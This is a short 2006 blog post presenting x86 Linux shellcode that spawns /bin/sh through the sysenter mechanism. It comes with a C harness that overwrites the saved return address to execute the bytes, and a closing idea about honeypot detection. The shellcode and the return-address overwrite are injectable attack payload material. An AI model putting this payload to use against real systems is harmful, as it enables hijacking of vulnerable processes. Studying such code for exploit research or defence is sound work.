Sunday, November 26, 2006

Sysenter shellcode

Not much going on tonight. Whipped up some useless shellcode using the sysenter syscall method as opposed to `int 0x80`, nothing new. The size increase from using int 0x80 is pretty small too. I have seen some other shellcodes using the 'push ecx, edx, ebp, sysenter' method, this one is a little bit smaller. I wrote it on Ubuntu (Dapper-Drake), the %gs offset may need adjusting on other systems. Here it is,
static char code[] =
"\x31\xc0" /* xor %eax, %eax */
"\x50" /* pushl %eax */
"\x68\x2f\x2f\x73\x68" /* /bin/sh */
"\x68\x2f\x62\x69\x6e"
"\x89\xe3" /* mov %esp, %ebx */
"\x50" /* push %eax */
"\x53" /* push %ebx */
"\x89\xe1" /* mov %esp, %ecx */
"\x31\xd2" /* xor %edx, %edx */
"\xb0\x0b" /* mov $0xb, %al */
"\x65\xff\x15\x10"; /* call *%gs:0x10 */

__attribute__((noreturn)) int main()
{
int *ret;

ret = (int *)&ret + 2;
(*ret) = (int)code;
}
I wonder how many shellcodes would fail if you disabled the use of `int 0x80` interrupt from userspace on a honeypot. I cant think of any valid applications that would break, but im sure some would. That would be an interesting experiment.